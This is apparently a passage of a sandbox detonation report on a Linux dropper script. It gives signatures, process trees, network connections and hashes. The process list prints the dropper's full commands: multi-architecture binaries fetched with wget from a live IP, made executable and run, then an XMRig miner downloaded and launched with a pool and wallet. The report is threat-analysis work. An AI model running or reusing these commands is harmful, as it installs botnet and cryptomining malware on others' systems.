N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/bots /tmp/bots N/A

Reads system routing table

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.mips N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.mips N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/tyo2831qq.mips N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tyo2831qq.x86 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.i586 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.m68k /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.mips /usr/bin/wget N/A
File opened for modification /tmp/bots /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm6 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x32 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.ppc /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm7 /usr/bin/wget N/A

Processes

/tmp/tyo2831qq.sh

[/tmp/tyo2831qq.sh]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mips]

/bin/chmod

[chmod 777 tyo2831qq.mips]

/tmp/tyo2831qq.mips

[./tyo2831qq.mips]

/usr/bin/wget

[wget http://31.172.80.237/bots]

/bin/chmod

[chmod 777 bots]

/tmp/bots

[./bots]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mpsl]

/bin/chmod

[chmod 777 tyo2831qq.mpsl]

/tmp/tyo2831qq.mpsl

[./tyo2831qq.mpsl]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.sh4]

/bin/chmod

[chmod 777 tyo2831qq.sh4]

/tmp/tyo2831qq.sh4

[./tyo2831qq.sh4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x86]

/bin/chmod

[chmod 777 tyo2831qq.x86]

/tmp/tyo2831qq.x86

[./tyo2831qq.x86]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm6]

/bin/chmod

[chmod 777 tyo2831qq.arm6]

/tmp/tyo2831qq.arm6

[./tyo2831qq.arm6]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x32]

/bin/chmod

[chmod 777 tyo2831qq.x32]

/tmp/tyo2831qq.x32

[./tyo2831qq.x32]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.ppc]

/bin/chmod

[chmod 777 tyo2831qq.ppc]

/tmp/tyo2831qq.ppc

[./tyo2831qq.ppc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.i586]

/bin/chmod

[chmod 777 tyo2831qq.i586]

/tmp/tyo2831qq.i586

[./tyo2831qq.i586]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.m68k]

/bin/chmod

[chmod 777 tyo2831qq.m68k]

/tmp/tyo2831qq.m68k

[./tyo2831qq.m68k]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.spc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm7]

/bin/chmod

[chmod 777 tyo2831qq.arm7]

/tmp/tyo2831qq.arm7

[./tyo2831qq.arm7]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm5]

/bin/rm

[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]

/usr/bin/wget

[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]

/bin/chmod

[chmod 777 xmrig]

/tmp/xmrig

[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]

Network

Country Destination Domain Proto
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 N/A tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

/tmp/bots

MD5 2615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA1 4286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256 e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512 b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 04:09

Reported

2024-11-09 04:11

Platform

debian9-mipsel-20240418-en

Max time kernel

95s

Max time network

96s

Command Line

[/tmp/tyo2831qq.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/bots /tmp/bots N/A
N/A /tmp/xmrig /tmp/xmrig N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Reads system routing table

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.mpsl N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.mpsl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/tyo2831qq.mips N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/bots /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm6 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x32 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.i586 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.m68k /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.mips /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x86 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.ppc /usr/bin/wget N/A
File opened for modification /tmp/xmrig /usr/bin/wget N/A

Processes

/tmp/tyo2831qq.sh

[/tmp/tyo2831qq.sh]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mips]

/bin/chmod

[chmod 777 tyo2831qq.mips]

/tmp/tyo2831qq.mips

[./tyo2831qq.mips]

/usr/bin/wget

[wget http://31.172.80.237/bots]

/bin/chmod

[chmod 777 bots]

/tmp/bots

[./bots]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mpsl]

/bin/chmod

[chmod 777 tyo2831qq.mpsl]

/tmp/tyo2831qq.mpsl

[./tyo2831qq.mpsl]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.sh4]

/bin/chmod

[chmod 777 tyo2831qq.sh4]

/tmp/tyo2831qq.sh4

[./tyo2831qq.sh4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x86]

/bin/chmod

[chmod 777 tyo2831qq.x86]

/tmp/tyo2831qq.x86

[./tyo2831qq.x86]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm6]

/bin/chmod

[chmod 777 tyo2831qq.arm6]

/tmp/tyo2831qq.arm6

[./tyo2831qq.arm6]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x32]

/bin/chmod

[chmod 777 tyo2831qq.x32]

/tmp/tyo2831qq.x32

[./tyo2831qq.x32]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.ppc]

/bin/chmod

[chmod 777 tyo2831qq.ppc]

/tmp/tyo2831qq.ppc

[./tyo2831qq.ppc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.i586]

/bin/chmod

[chmod 777 tyo2831qq.i586]

/tmp/tyo2831qq.i586

[./tyo2831qq.i586]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.m68k]

/bin/chmod

[chmod 777 tyo2831qq.m68k]

/tmp/tyo2831qq.m68k

[./tyo2831qq.m68k]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.spc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm7]

/bin/chmod

[chmod 777 tyo2831qq.arm7]

/tmp/tyo2831qq.arm7

[./tyo2831qq.arm7]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm5]

/bin/rm

[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]

/usr/bin/wget

[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]

/bin/chmod

[chmod 777 xmrig]

/tmp/xmrig

[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]

Network

Country Destination Domain Proto
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 N/A tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 1.1.1.1:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp

Files

/tmp/bots

MD5 2615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA1 4286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256 e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512 b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78

/tmp/xmrig

MD5 49fde861072798623bf35de4794f7d3d
SHA1 1c9b225d3e34db9c2a0fecb9f2c254da1371f953
SHA256 8268144d8232fc0dae86c2536eef50916e4ee9a23b15a561aa72971714359383
SHA512 14393a6a7f9103340338e74457c6f95eb7180d2a90b87e01945be621a0d0798c05fdfb08ec3dbc2ca61ee2cbb6299b48e8b27c01b00913b5e5e9ed704318ac22

/root/.wget-hsts

MD5 5e330d55bb520266447b86c2c47fdc0f
SHA1 28e862fa757fba4f7dca7fbeac6433b1bdf75ca7
SHA256 ea7045dc1e2dd6c47941880d671c5ba8536a20728965c362881e7fee0fb3d1b2
SHA512 8232b08e80b64a8fe7b46140e9ad7a170a06a66e59a6f728b9fda80531033d2ebe0fe68c0dde05a0e832d96c8817678e1ae27a8729a7e6d0c23ad06c8b9a6262